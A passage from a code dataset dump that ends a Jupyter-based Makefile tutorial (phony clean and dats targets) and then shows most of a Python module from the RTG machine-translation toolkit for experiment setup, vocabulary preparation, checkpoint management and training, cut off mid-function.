recreate our data files, create a directory called clean, then run Make:\n\n# In[124]:\n\nget_ipython().system('make \"$repo_path\"/isles.dat \"$repo_path\"/abyss.dat')\nget_ipython().system('mkdir \"$repo_path\"/clean')\n\n\n# In[125]:\n\nget_ipython().system('make \"$repo_path\"/clean')\n\n\n# > Make finds a file (or directory) called clean and, as its clean rule has no dependencies, assumes that clean has been built and is up-to-date and so does not execute the rule’s actions. As we are using clean as a short-hand, we need to tell Make to always execute this rule if we run make clean, by telling Make that this is a phony target, that it does not build anything. This we do by marking the target as .PHONY:\n\n# In[142]:\n\nmakefile_contents_phony_clean = \"\"\"\n.PHONY : clean\nclean:\n{tab}rm -f {repo_path}/*.dat\n\"\"\".format(**format_context)\nmakefile_contents = ''.join((makefile_contents_0, makefile_contents_1, makefile_contents_phony_clean))\n\n\n# In[143]:\n\n# add makefile_contents to Makefile\nget_ipython().system('printf \"$makefile_contents\" > Makefile')\n\n\n# *Now get expected result.*\n\n# In[145]:\n\nget_ipython().system('make clean')\n\n\n# > We can add a similar command to create all the data files. We can put this at the top of our Makefile so that it is the default target, which is executed by default if no target is given to the make command:\n# \n# \n\n# In[146]:\n\nmakefile_contents_create_all_data = \"\"\"\n.PHONY : dats\ndats : {repo_path}/isles.dat {repo_path}/abyss.dat\n\"\"\".format(**format_context)\nmakefile_contents = ''.join((\n makefile_contents_0, \n makefile_contents_1, \n makefile_contents_phony_clean, \n makefile_contents_create_all_data,\n))\n\n\n# In[147]:\n\n# add makefile_contents to Makefile\nget_ipython().system('printf \"$makefile_contents\" > Makefile')\n\n\n# In[148]:\n\nget_ipython().system('make dats')\n\n\n# In[149]:\n\nget_ipython().system('make dats')\n\n\n# > The following figure shows a graph of the dependencies embodied within our Makefile, involved in building the dats target\n\n# In[151]:\n\ndisplay(Image('http://swcarpentry.github.io/make-novice/fig/02-makefile.png', unconfined=True))\n\n","sub_path":"content/posts/makefile-tutorial/makefile_tutorial_1.py","file_name":"makefile_tutorial_1.py","file_ext":"py","file_size_in_byte":10449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"318248699","text":"import copy\nimport os\nimport random\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\nfrom functools import partial\nfrom typing import Optional, Dict, List, Tuple, Union, Any\nimport time\n\nimport numpy as np\nimport torch\n\nfrom rtg import log, yaml\nfrom rtg.data.dataset import (TSVData, BatchIterable, LoopingIterable, SqliteFile, GenerativeBatchIterable)\nfrom rtg.data.codec import Field, SPField, NLField, PretrainMatchField\nfrom rtg.utils import IO, line_count\n\nseeded = False\n\n\ndef load_conf(inp: Union[str, Path]):\n with IO.reader(inp) as fh:\n return yaml.load(fh)\n\n\nclass BaseExperiment:\n\n def __init__(self, work_dir: Union[str, Path], read_only=False,\n config: Union[str, Path, Optional[Dict[str, Any]]] = None):\n if type(work_dir) is str:\n work_dir = Path(work_dir)\n\n log.info(f\"Initializing an experiment. Directory = {work_dir}\")\n self.read_only = read_only\n self.work_dir = work_dir\n self.log_dir = work_dir / 'logs'\n self.log_file = self.log_dir / 'rtg.log'\n self.data_dir = work_dir / 'data'\n self.model_dir = work_dir / 'models'\n self._config_file = work_dir / 'conf.yml'\n if isinstance(config, str) or isinstance(config, Path):\n config = load_conf(config)\n self.config = config if config else load_conf(self._config_file)\n self.codec_name = self.config.get('prep', {}).get('codec_lib', 'sentpiece') # with default\n codec_libs = {'sentpiece': SPField,\n 'nlcodec': NLField,\n 'pretrainmatch': PretrainMatchField}\n self.codec_supports_multiproc = self.codec_name in {'nlcodec'}\n assert self.codec_name in codec_libs, f'{self.codec_name} is not in {codec_libs.keys()}'\n log.info(f\"codec lib = {self.codec_name}\")\n self.Field = codec_libs[self.codec_name]\n\n self._shared_field_file = self.data_dir / f'{self.codec_name}.shared.model'\n self._prepared_flag = self.work_dir / '_PREPARED'\n self._trained_flag = self.work_dir / '_TRAINED'\n\n self.train_file = self.data_dir / 'train.tsv.gz'\n self.train_db = self.data_dir / 'train.db'\n self.train_db_tmp = self.data_dir / 'train.db.tmp'\n self.finetune_file = self.data_dir / 'finetune.db'\n self.valid_file = self.data_dir / 'valid.tsv.gz'\n self.combo_file = self.data_dir / 'combo.tsv.gz'\n # a set of samples to watch the progress qualitatively\n self.samples_file = self.data_dir / 'samples.tsv.gz'\n\n if not read_only:\n for _dir in [self.model_dir, self.data_dir, self.log_dir]:\n if not _dir.exists():\n _dir.mkdir(parents=True)\n\n assert self.config, 'Looks like the config is emtpy or invalid'\n self.maybe_seed()\n\n self.shared_field = self.Field(str(self._shared_field_file)) \\\n if self._shared_field_file.exists() else None\n\n def maybe_seed(self):\n global seeded\n if not seeded and 'seed' in self.config:\n seed = self.config['seed']\n log.info(f\"Manual seeding the RNG with {seed}\")\n random.seed(seed)\n torch.manual_seed(seed)\n np.random.seed(seed)\n if torch.cuda.is_available():\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n seeded = True\n else:\n log.info(\"No manual seed! Letting the RNGs do their stuff\")\n\n def store_config(self):\n yaml.dump(self.config, stream=self._config_file)\n\n @property\n def model_type(self) -> Optional[str]:\n return self.config.get('model_type')\n\n @model_type.setter\n def model_type(self, mod_type: str):\n self.config['model_type'] = mod_type\n\n def has_prepared(self):\n return self._prepared_flag.exists()\n\n def has_trained(self):\n return self._trained_flag.exists()\n\n def store_model(self, optimizer_step: int, model, train_score: float, val_score: float, keep: int,\n prefix='model', keeper_sort='step'):\n \"\"\"\n saves model to a given path\n :param optimizer_step: optimizer step of the model\n :param model: model object itself\n :param train_score: score of model on training split\n :param val_score: score of model on validation split\n :param keep: number of good models to keep, bad models will be deleted\n :param prefix: prefix to store model. default is \"model\"\n :param keeper_sort: criteria for choosing the old or bad models for deletion.\n Choices: {'total_score', 'step'}\n :return:\n \"\"\"\n # TODO: improve this by skipping the model save if the model is not good enough to be saved\n if self.read_only:\n log.warning(\"Ignoring the store request; experiment is readonly\")\n return\n name = f'{prefix}_{optimizer_step:03d}_{train_score:.6f}_{val_score:.6f}.pkl'\n path = self.model_dir / name\n log.info(f\"Saving optimizer step {optimizer_step} to {path}\")\n torch.save(model, str(path))\n\n del_models = []\n if keeper_sort == 'total_score':\n del_models = self.list_models(sort='total_score', desc=False)[keep:]\n elif keeper_sort == 'step':\n del_models = self.list_models(sort='step', desc=True)[keep:]\n else:\n Exception(f'Sort criteria{keeper_sort} not understood')\n for d_model in del_models:\n log.info(f\"Deleting model {d_model} . Keep={keep}, sort={keeper_sort}\")\n os.remove(str(d_model))\n\n with IO.writer(os.path.join(self.model_dir, 'scores.tsv'), append=True) as f:\n cols = [str(optimizer_step), datetime.now().isoformat(), name, f'{train_score:g}',\n f'{val_score:g}']\n f.write('\\t'.join(cols) + '\\n')\n\n @staticmethod\n def _path_to_validn_score(path):\n parts = str(path.name).replace('.pkl', '').split('_')\n valid_score = float(parts[-1])\n return valid_score\n\n @staticmethod\n def _path_to_total_score(path):\n parts = str(path.name).replace('.pkl', '').split('_')\n tot_score = float(parts[-2]) + float(parts[-1])\n return tot_score\n\n @staticmethod\n def _path_to_step_no(path):\n parts = str(path.name).replace('.pkl', '').split('_')\n step_no = int(parts[-3])\n return step_no\n\n def list_models(self, sort: str = 'step', desc: bool = True) -> List[Path]:\n \"\"\"\n Lists models in descending order of modification time\n :param sort: how to sort models ?\n - valid_score: sort based on score on validation set\n - total_score: sort based on validation_score + training_score\n - mtime: sort by modification time\n - step (default): sort by step number\n :param desc: True to sort in reverse (default); False to sort in ascending\n :return: list of model paths\n \"\"\"\n paths = list(self.model_dir.glob('model_*.pkl'))\n if not paths:\n paths = list(self.model_dir.glob('embeddings_*.gz'))\n sorters = {\n 'valid_score': self._path_to_validn_score,\n 'total_score': self._path_to_total_score,\n 'mtime': lambda p: p.stat().st_mtime,\n 'step': self._path_to_step_no\n }\n if sort not in sorters:\n raise Exception(f'Sort {sort} not supported. valid options: {sorters.keys()}')\n return sorted(paths, key=sorters[sort], reverse=desc)\n\n def _get_first_model(self, sort: str, desc: bool) -> Tuple[Optional[Path], int]:\n \"\"\"\n Gets the first model that matches the given sort criteria\n :param sort: sort mechanism\n :param desc: True for descending, False for ascending\n :return: Tuple[Optional[Path], step_num:int]\n \"\"\"\n models = self.list_models(sort=sort, desc=desc)\n print(models)\n if models:\n name = models[0].name.replace('.pkl', '').replace('.txt.gz', '')\n step, train_score, valid_score = name.split('_')[-3:]\n return models[0], int(step)\n else:\n return None, 0\n\n def get_best_known_model(self) -> Tuple[Optional[Path], int]:\n \"\"\"Gets best Known model (best on lowest scores on training and validation sets)\n \"\"\"\n return self._get_first_model(sort='total_score', desc=False)\n\n def get_last_saved_model(self) -> Tuple[Optional[Path], int]:\n return self._get_first_model(sort='step', desc=True)\n\n @property\n def model_args(self) -> Optional[Dict]:\n \"\"\"\n Gets args from file\n :return: args if exists or None otherwise\n \"\"\"\n return self.config.get('model_args')\n\n @model_args.setter\n def model_args(self, model_args):\n \"\"\"\n set model args\n \"\"\"\n self.config['model_args'] = model_args\n\n @property\n def optim_args(self) -> Tuple[Optional[str], Dict]:\n \"\"\"\n Gets optimizer args from file\n :return: optimizer args if exists or None otherwise\n \"\"\"\n opt_conf = self.config.get('optim')\n if opt_conf:\n return opt_conf.get('name'), opt_conf.get('args')\n else:\n return None, {}\n\n @optim_args.setter\n def optim_args(self, optim_args: Tuple[str, Dict]):\n \"\"\"\n set optimizer args\n \"\"\"\n name, args = optim_args\n self.config['optim'].update({'name': name, 'args': args})\n\n @property\n def shared_vocab(self) -> Field:\n return self.shared_field\n\n @staticmethod\n def get_first_found_file(paths: List[Path]):\n \"\"\"returns the first file that is not None, and actually exists on disc;\n If no file is valid, it returns None\"\"\"\n for p in paths:\n if p and p.exists():\n return p\n return None\n\n\nclass TranslationExperiment(BaseExperiment):\n\n def __init__(self, work_dir: Union[str, Path], read_only=False,\n config: Union[str, Path, Optional[Dict[str, Any]]] = None):\n super().__init__(work_dir, read_only=read_only, config=config)\n self._src_field_file = self.data_dir / f'{self.codec_name}.src.model'\n self._tgt_field_file = self.data_dir / f'{self.codec_name}.tgt.model'\n\n self.emb_src_file = self.data_dir / 'emb_src.pt'\n self.emb_tgt_file = self.data_dir / 'emb_tgt.pt'\n self.ext_emb_src_file = self.data_dir / 'ext_emb_src.pt' # external Embeddings\n self.ext_emb_tgt_file = self.data_dir / 'ext_emb_tgt.pt' # external Embeddings\n\n self.reload_vocabs()\n\n # Either shared field OR individual src and tgt fields\n assert not (self.shared_field and self.src_field)\n assert not (self.shared_field and self.tgt_field)\n # both are set or both are unset\n #assert (self.src_field is None) == (self.tgt_field is None)\n\n self._unsupervised = self.model_type in {'binmt', 'rnnlm', 'tfmlm'}\n if self._unsupervised:\n self.mono_train_src = self.data_dir / 'mono.train.src.gz'\n self.mono_train_tgt = self.data_dir / 'mono.train.tgt.gz'\n self.mono_valid_src = self.data_dir / 'mono.valid.src.gz'\n self.mono_valid_tgt = self.data_dir / 'mono.valid.tgt.gz'\n\n self.parent_model_state = self.data_dir / 'parent_model_state.pt'\n\n def reload_vocabs(self):\n self.src_field, self.tgt_field, self.shared_field = [\n self.Field(str(f)) if f.exists() else None for f in (\n self._src_field_file, self._tgt_field_file, self._shared_field_file)]\n\n def check_line_count(self, name, file1, file2):\n count1 = line_count(file1)\n count2 = line_count(file2)\n if count1 == count2:\n log.info(f\"Found {count1:,} parallel lines for {name}\")\n else:\n log.error(f\"Found line mismatch in {name} \")\n raise Exception(f'{file1} has {count1:,} lines but {file2} has {count2:,} lines')\n\n def pre_process_parallel(self, args: Dict[str, Any]):\n # check if files are parallel\n self.check_line_count('validation', args['valid_src'], args['valid_tgt'])\n if 'spark' in self.config:\n log.warning(f\"Spark backend detected: line count on training data is skipped\")\n else:\n log.warning(f\"Going to count lines. If this is a big dataset, it will take long time\")\n self.check_line_count('training', args['train_src'], args['train_tgt'])\n\n xt_args = dict(no_split_toks=args.get('no_split_toks'),\n char_coverage=args.get('char_coverage', 0))\n if args.get('shared_vocab'): # shared vocab\n corpus = [args[key] for key in ['train_src', 'train_tgt', 'mono_src', 'mono_tgt']\n if args.get(key)]\n self.shared_field = self._make_vocab(\"shared\", self._shared_field_file, args['pieces'],\n args['max_types'], corpus=corpus, **xt_args)\n else: # separate vocabularies\n src_corpus = [args[key] for key in ['train_src', 'mono_src'] if args.get(key)]\n self.src_field = self._make_vocab(\"src\", self._src_field_file, args['pieces'],\n args['max_src_types'], corpus=src_corpus, **xt_args)\n\n # target vocabulary\n tgt_corpus = [args[key] for key in ['train_tgt', 'mono_tgt'] if args.get(key)]\n self.tgt_field = self._make_vocab(\"src\", self._tgt_field_file, args['pieces'],\n args['max_tgt_types'], corpus=tgt_corpus, **xt_args)\n\n train_file = self.train_db\n\n self._pre_process_parallel('train_src', 'train_tgt', out_file=train_file, args=args,\n line_check=False)\n self._pre_process_parallel('valid_src', 'valid_tgt', out_file=self.valid_file, args=args,\n line_check=False)\n\n if args.get(\"finetune_src\") or args.get(\"finetune_tgt\"):\n self._pre_process_parallel('finetune_src', 'finetune_tgt', self.finetune_file)\n\n # get samples from validation set\n n_samples = args.get('num_samples', 5)\n space_tokr = lambda line: line.strip().split()\n val_raw_recs = TSVData.read_raw_parallel_recs(\n args['valid_src'], args['valid_tgt'], args['truncate'], args['src_len'],\n args['tgt_len'], src_tokenizer=space_tokr, tgt_tokenizer=space_tokr)\n val_raw_recs = list(val_raw_recs)\n random.shuffle(val_raw_recs)\n samples = val_raw_recs[:n_samples]\n TSVData.write_parallel_recs(samples, self.samples_file)\n\n def _make_vocab(self, name: str, vocab_file: Path, model_type: str, vocab_size: int,\n corpus: List, no_split_toks: List[str] = None, char_coverage=0) -> Field:\n \"\"\"\n Construct vocabulary file\n :param name: name : src, tgt or shared -- for the sake of logging\n :param vocab_file: where to save the vocab file\n :param model_type: sentence piece model type\n :param vocab_size: max types in vocab\n :param corpus: as the name says, list of files from which the vocab should be learned\n :param no_split_toks: tokens that needs to be preserved from splitting, or added\n :return:\n \"\"\"\n if vocab_file.exists():\n log.info(f\"{vocab_file} exists. Skipping the {name} vocab creation\")\n return self.Field(str(vocab_file))\n flat_uniq_corpus = set() # remove dupes, flat the nested list or sets\n for i in corpus:\n if isinstance(i, set) or isinstance(i, list):\n flat_uniq_corpus.update(i)\n else:\n flat_uniq_corpus.add(i)\n\n flat_uniq_corpus = list(flat_uniq_corpus)\n log.info(f\"Going to build {name} vocab from files\")\n return self.Field.train(model_type, vocab_size, str(vocab_file), flat_uniq_corpus,\n no_split_toks=no_split_toks, char_coverage=char_coverage)\n\n def pre_process_mono(self, args):\n xt_args = dict(no_split_toks=args.get('no_split_toks'),\n char_coverage=args.get('char_coverage', 0))\n\n mono_files = [args[key] for key in ['mono_train_src', 'mono_train_tgt'] if key in args]\n assert mono_files, \"At least one of 'mono_train_src', 'mono_train_tgt' should be set\"\n log.info(f\"Found mono files: {mono_files}\")\n if args.get('shared_vocab'):\n self.shared_field = self._make_vocab(\"shared\", self._shared_field_file, args['pieces'],\n args['max_types'], corpus=mono_files, **xt_args)\n else: # separate vocabularies\n if 'mono_train_src' in args:\n self.src_field = self._make_vocab(\"src\", self._src_field_file,\n args['pieces'], args['max_src_types'],\n corpus=[args['mono_train_src']], **xt_args)\n else:\n log.warning(\"Skipping source vocab creation since mono_train_src is not given\")\n\n # target vocabulary\n if 'mono_train_tgt' in args:\n self.tgt_field = self._make_vocab(\"src\", self._tgt_field_file,\n args['pieces'], args['max_tgt_types'],\n corpus=[args['mono_train_tgt']], **xt_args)\n else:\n log.warning(\"Skipping target vocab creation since mono_train_tgt is not given\")\n\n def _prep_file(file_key, out_file, do_truncate, max_len, field: Field):\n if file_key not in args:\n log.warning(f'Skipped: {file_key} because it is not found in config')\n return\n\n raw_file = args[file_key]\n\n recs = TSVData.read_raw_mono_recs(raw_file, do_truncate, max_len, field.encode_as_ids)\n # TODO: use SQLite storage\n TSVData.write_mono_recs(recs, out_file)\n if args.get('text_files'):\n recs = TSVData.read_raw_mono_recs(raw_file, do_truncate, max_len, field.tokenize)\n TSVData.write_mono_recs(recs, str(out_file).replace('.tsv', '.pieces.tsv'))\n\n _prep_file('mono_train_src', self.mono_train_src, args['truncate'], args['src_len'],\n self.src_vocab)\n _prep_file('mono_train_tgt', self.mono_train_tgt, args['truncate'], args['tgt_len'],\n self.tgt_vocab)\n\n _prep_file('mono_valid_src', self.mono_valid_src, args['truncate'], args['src_len'],\n self.src_vocab)\n _prep_file('mono_valid_tgt', self.mono_valid_tgt, args['truncate'], args['tgt_len'],\n self.tgt_vocab)\n\n def _pre_process_parallel(self, src_key: str, tgt_key: str, out_file: Path,\n args: Optional[Dict[str, Any]] = None, line_check=True,\n split_ratio: float = 0.):\n \"\"\"\n Pre process records of a parallel corpus\n :param args: all arguments for 'prep' task\n :param src_key: key that contains source sequences\n :param tgt_key: key that contains target sequences\n :param out_file: path to store processed TSV data (compresses if name ends with .gz)\n :return:\n \"\"\"\n args = args if args else self.config['prep']\n log.info(f\"Going to prep files {src_key} and {tgt_key}\")\n assert src_key in args, f'{src_key} not found in experiment config or args'\n assert tgt_key in args, f'{tgt_key} not found in experiment config or args'\n if line_check:\n assert line_count(args[src_key]) == line_count(args[tgt_key]), \\\n f'{args[src_key]} and {args[tgt_key]} must have same number of lines'\n # create Piece IDs\n s_time = time.time()\n reader_func = TSVData.read_raw_parallel_recs\n parallel_recs = reader_func(\n args[src_key], args[tgt_key], args['truncate'], args['src_len'], args['tgt_len'],\n src_tokenizer=partial(self.src_vocab.encode_as_ids, split_ratio=split_ratio),\n tgt_tokenizer=partial(self.tgt_vocab.encode_as_ids, split_ratio=split_ratio))\n if any([out_file.name.endswith(suf) for suf in ('.db', '.db.tmp')]):\n SqliteFile.write(out_file, records=parallel_recs)\n else:\n TSVData.write_parallel_recs(parallel_recs, out_file)\n e_time = time.time()\n log.info(f\"Time taken to process: {timedelta(seconds=(e_time - s_time))}\")\n if args.get('text_files'):\n # Redo again as plain text files\n parallel_recs = reader_func(\n args[src_key], args[tgt_key], args['truncate'], args['src_len'], args['tgt_len'],\n src_tokenizer=self.src_vocab.tokenize, tgt_tokenizer=self.tgt_vocab.tokenize)\n\n text_file_name = str(out_file).replace('.db', '.tsv.gz').replace('.tsv', '.pieces.tsv')\n TSVData.write_parallel_recs(parallel_recs, text_file_name)\n\n def maybe_pre_process_embeds(self, do_clean=False):\n\n def _read_vocab(path: Path) -> List[str]:\n with IO.reader(path) as rdr:\n vocab = [line.strip().split()[0] for line in rdr]\n if do_clean:\n # sentence piece starts with '▁' character\n vocab = [word[1:] if word[0] == '▁' else word for word in vocab]\n return vocab\n\n def _map_and_store(inp: Path, vocab_file: Path):\n id_to_str = _read_vocab(vocab_file)\n str_to_id = {tok: idx for idx, tok in enumerate(id_to_str)}\n assert len(id_to_str) == len(id_to_str)\n vocab_size = len(id_to_str)\n\n matched_set, ignored_set, duplicate_set = set(), set(), set()\n\n with inp.open(encoding='utf-8') as in_fh:\n header = in_fh.readline()\n parts = header.strip().split()\n if len(parts) == 2:\n tot, dim = int(parts[0]), int(parts[1])\n matrix = torch.zeros(vocab_size, dim)\n else:\n assert len(parts) > 2\n word, vec = parts[0], [float(x) for x in parts[1:]]\n dim = len(vec)\n matrix = torch.zeros(vocab_size, dim)\n if word in str_to_id:\n matrix[str_to_id[word]] = torch.tensor(vec, dtype=torch.float)\n matched_set.add(word)\n else:\n ignored_set.add(word)\n\n for line in in_fh:\n parts = line.strip().split()\n word = parts[0]\n if word in str_to_id:\n if word in matched_set:\n duplicate_set.add(word)\n # Note: this overwrites duplicate words\n vec = [float(x) for x in parts[1:]]\n matrix[str_to_id[word]] = torch.tensor(vec, dtype=torch.float)\n matched_set.add(word)\n else:\n ignored_set.add(word)\n pre_trained = matched_set | ignored_set\n vocab_set = set(id_to_str)\n oovs = vocab_set - matched_set\n stats = {\n 'pre_trained': len(pre_trained),\n 'vocab': len(vocab_set),\n 'matched': len(matched_set),\n 'ignored': len(ignored_set),\n 'oov': len(oovs)\n }\n stats.update({\n 'oov_rate': stats['oov'] / stats['vocab'],\n 'match_rate': stats['matched'] / stats['vocab'],\n 'useless_rate': stats['ignored'] / stats['pre_trained'],\n 'useful_rate': stats['matched'] / stats['pre_trained']\n })\n return matrix, stats\n\n def _write_emb_matrix(matrix, path: str):\n torch.save(matrix, path)\n\n def _write_dict(dict, path: Path):\n with IO.writer(path) as out:\n for key, val in dict.items():\n out.write(f\"{key}\\t{val}\\n\")\n\n args = self.config['prep']\n mapping = {\n 'pre_emb_src': self.emb_src_file,\n 'pre_emb_tgt': self.emb_tgt_file,\n 'ext_emb_src': self.ext_emb_src_file,\n 'ext_emb_tgt': self.ext_emb_tgt_file,\n }\n if not any(x in args for x in mapping):\n log.info(\"No pre trained embeddings are found in config; skipping it\")\n return\n\n for key, outp in mapping.items():\n if key in args:\n inp = Path(args[key])\n assert inp.exists()\n voc_file = self.data_dir / f'sentpiece.shared.vocab'\n if not voc_file.exists():\n field_name = key.split('_')[-1] # emb_src --> src ; emb_tgt --> tgt\n voc_file = self.data_dir / f'sentpiece.{field_name}.vocab'\n assert voc_file.exists()\n\n log.info(f\"Processing {key}: {inp}\")\n emb_matrix, report = _map_and_store(inp, voc_file)\n _write_dict(report, Path(str(outp) + '.report.txt'))\n _write_emb_matrix(emb_matrix, str(outp))\n\n def shrink_vocabs(self):\n assert self.codec_name == 'nlcodec', 'Only nlcodec supports shrinking of vocabs'\n args = self.config['prep']\n\n if self.shared_vocab:\n corpus = [args[key] for key in ['train_src', 'train_tgt', 'mono_src', 'mono_tgt']\n if args.get(key)]\n remap_src = self.shared_vocab.shrink_vocab(files=corpus, min_freq=1,\n save_at=self._shared_field_file)\n remap_tgt = remap_src\n else:\n corpus_src = [args[key] for key in ['train_src', 'mono_src'] if args.get(key)]\n remap_src = self.src_vocab.shrink_vocab(files=corpus_src, min_freq=1,\n save_at=self._src_field_file)\n corpus_tgt = [args[key] for key in ['train_tgt', 'mono_tgt'] if args.get(key)]\n remap_tgt = self.tgt_vocab.shrink_vocab(files=corpus_tgt, min_freq=1,\n save_at=self._tgt_field_file)\n self.reload_vocabs()\n self.model_args['src_vocab'] = len(self.src_vocab)\n self.model_args['tgt_vocab'] = len(self.tgt_vocab)\n return remap_src, remap_tgt\n\n def inherit_parent(self):\n parent = self.config['parent']\n parent_exp = TranslationExperiment(parent['experiment'], read_only=True)\n log.info(f\"Parent experiment: {parent_exp.work_dir}\")\n parent_exp.has_prepared()\n vocab_sepc = parent.get('vocab')\n if vocab_sepc:\n log.info(f\"Parent vocabs inheritance spec: {vocab_sepc}\")\n codec_lib = parent_exp.config['prep'].get('codec_lib')\n if codec_lib:\n self.config['prep']['codec_lib'] = codec_lib\n\n def _locate_field_file(exp: TranslationExperiment, name, check_exists=False) -> Path:\n switch = {'src': exp._src_field_file,\n 'tgt': exp._tgt_field_file,\n 'shared': exp._shared_field_file}\n assert name in switch, f'{name} not allowed; valid options= {switch.keys()}'\n file = switch[name]\n if check_exists:\n assert file.exists(), f'{file} doesnot exist; for {name} of {exp.work_dir}'\n return file\n\n for to_field, from_field in vocab_sepc.items():\n from_field_file = _locate_field_file(parent_exp, from_field, check_exists=True)\n to_field_file = _locate_field_file(self, to_field, check_exists=False)\n IO.copy_file(from_field_file, to_field_file)\n self.reload_vocabs()\n else:\n log.info(\"No vocabularies are inherited from parent\")\n model_sepc = parent.get('model')\n if model_sepc:\n log.info(\"Parent model inheritance spec\")\n if model_sepc.get('args'):\n self.model_args = parent_exp.model_args\n ensemble = model_sepc.get('ensemble', 1)\n model_paths = parent_exp.list_models(sort='step', desc=True)[:ensemble]\n log.info(f\"Averaging {len(model_paths)} checkpoints of parent model: \\n{model_paths}\")\n from rtg.module.decoder import Decoder\n avg_state = Decoder.average_states(model_paths=model_paths)\n log.info(f\"Saving parent model's state to {self.parent_model_state}\")\n torch.save(avg_state, self.parent_model_state)\n\n shrink_spec = parent.get('shrink')\n if shrink_spec:\n remap_src, remap_tgt = self.shrink_vocabs()\n def map_rows(mapping: List[int], source: torch.Tensor, name=''):\n assert max(mapping) < len(source)\n target = torch.zeros((len(mapping), *source.shape[1:]),\n dtype=source.dtype, device=source.device)\n for new_idx, old_idx in enumerate(mapping):\n target[new_idx] = source[old_idx]\n log.info(f\"Mapped {name} {source.shape} --> {target.shape} \")\n return target\n\n \"\"\" src_embed.0.lut.weight [N x d]\n tgt_embed.0.lut.weight [N x d]\n generator.proj.weight [N x d]\n generator.proj.bias [N] \"\"\"\n if remap_src:\n key = 'src_embed.0.lut.weight'\n avg_state[key] = map_rows(remap_src, avg_state[key], name=key)\n if remap_tgt:\n map_keys = ['tgt_embed.0.lut.weight', 'generator.proj.weight', 'generator.proj.bias']\n for key in map_keys:\n if key not in avg_state:\n log.warning(f'{key} not found in avg_state of parent model. Mapping skipped')\n continue\n avg_state[key] = map_rows(remap_tgt, avg_state[key], name=key)\n if self.parent_model_state.exists():\n self.parent_model_state.rename(self.parent_model_state.with_suffix('.orig'))\n torch.save(avg_state, self.parent_model_state)\n self.persist_state() # this will fix src_vocab and tgt_vocab of model_args conf\n\n\n def pre_process(self, args=None, force=False):\n if self.has_prepared() and not force:\n log.warning(\"Already prepared\")\n return\n args = args if args else self.config['prep']\n if 'parent' in self.config:\n self.inherit_parent()\n\n if 'same_data' in args:\n data = Path(args['same_data']) / 'data'\n assert data.exists()\n log.info(f\"Reusing prepared data dir from {data}\")\n if self.data_dir.exists():\n if self.data_dir.is_symlink():\n self.data_dir.unlink()\n else:\n self.data_dir.rename('data.bak')\n self.data_dir.symlink_to(data.resolve(), target_is_directory=True)\n self.reload_vocabs()\n else:\n vocabs = args.get('vocabs')\n if vocabs:\n parent = TranslationExperiment(vocabs, read_only=True)\n parent.copy_vocabs(self)\n self.shared_field, self.src_field, self.tgt_field = [\n self.Field(str(f)) if f.exists() else None\n for f in (self._shared_field_file, self._src_field_file, self._tgt_field_file)]\n if self._unsupervised:\n self.pre_process_mono(args)\n else:\n self.pre_process_parallel(args)\n\n self.maybe_pre_process_embeds()\n # update state on disk\n self.persist_state()\n self._prepared_flag.touch()\n\n def persist_state(self):\n \"\"\"Writes state of current experiment to the disk\"\"\"\n assert not self.read_only\n if 'model_args' not in self.config:\n self.config['model_args'] = {}\n args = self.config['model_args']\n if self.model_type in {'rnnlm', 'tfmlm', 'wv_cbow'}:\n # Language models\n # TODO: improve the design of this thing\n args['vocab_size'] = max(len(self.src_vocab) if self.src_vocab else 0,\n len(self.tgt_vocab) if self.tgt_vocab else 0)\n else:\n # Translation models\n args['src_vocab'] = len(self.src_vocab) if self.src_vocab else 0\n args['tgt_vocab'] = len(self.tgt_vocab) if self.tgt_vocab else 0\n\n self.config['updated_at'] = datetime.now().isoformat()\n self.store_config()\n\n def train(self, args=None):\n run_args = copy.deepcopy(self.config.get('trainer', {}))\n if args:\n run_args.update(args)\n if 'init_args' in run_args:\n del run_args['init_args']\n train_steps = run_args['steps']\n finetune_steps = run_args.pop('finetune_steps', None)\n finetune_batch_size = run_args.pop('finetune_batch_size', run_args.get('batch_size'))\n if finetune_steps:\n assert type(finetune_steps) is int\n assert finetune_steps > train_steps, f'finetune_steps={finetune_steps} should be' \\\n f' greater than steps={train_steps}'\n\n _, last_step = self.get_last_saved_model()\n if self._trained_flag.exists():\n # noinspection PyBroadException\n try:\n last_step = max(last_step, yaml.load(self._trained_flag.read_text())['steps'])\n except Exception as _:\n pass\n\n if last_step >= train_steps and (finetune_steps is None or last_step >= finetune_steps):\n log.warning(\n f\"Already trained upto {last_step}; Requested: train={train_steps}, finetune={finetune_steps} Skipped\")\n return\n\n from rtg.registry import trainers, factories\n name, optim_args = self.optim_args\n trainer = trainers[self.model_type](self, optim=name,\n model_factory=factories[self.model_type], **optim_args)\n if last_step < train_steps: # regular training\n stopped = trainer.train(fine_tune=False, **run_args)\n if not self.read_only:\n status = dict(steps=train_steps, early_stopped=stopped, finetune=False)\n try:\n status['earlier'] = yaml.load(self._trained_flag.read_text())\n except Exception as _:\n pass\n yaml.dump(status, stream=self._trained_flag)\n if finetune_steps: # Fine tuning\n log.info(f\"Fine tuning upto {finetune_steps}, batch_size={finetune_batch_size}\")\n assert finetune_batch_size\n run_args['steps'] = finetune_steps\n run_args['batch_size'] = finetune_batch_size\n\n stopped = trainer.train(fine_tune=True, **run_args)\n status = dict(steps=finetune_steps, early_stopped=stopped, finetune=True)\n try:\n status['earlier'] = yaml.load(self._trained_flag.read_text())\n except Exception as _:\n pass\n yaml.dump(status, stream=self._trained_flag)\n\n @property\n def src_vocab(self) -> Field:\n return self.shared_field if self.shared_field is not None else self.src_field\n\n @property\n def tgt_vocab(self) -> Field:\n return self.shared_field if self.shared_field is not None else self.tgt_field\n\n def _get_batch_args(self):\n prep_args = self.config.get('prep', {})\n return {ok: prep_args[ik] for ik, ok in\n [('src_len', 'max_src_len'), ('tgt_len', 'max_tgt_len'), ('truncate', 'truncate')]\n if ik in prep_args}\n\n def get_train_data(self, batch_size: Union[int, Tuple[int,int]], steps: int = 0, sort_by='eq_len_rand_batch',\n batch_first=True, shuffle=False, fine_tune=False, keep_in_mem=False,\n split_ratio: float = 0., dynamic_epoch=False):\n\n data_path = self.train_db if self.train_db.exists() else self.train_file\n if fine_tune:\n if not self.finetune_file.exists():\n # user may have added fine tune file later\n self._pre_process_parallel('finetune_src', 'finetune_tgt', self.finetune_file)\n log.info(\"Using Fine tuning corpus instead of training corpus\")\n data_path = self.finetune_file\n\n if split_ratio > 0:\n data_path = IO.maybe_tmpfs(data_path)\n train_file = data_path.with_suffix('.db.tmp')\n file_creator = partial(self.file_creator, train_file=train_file, 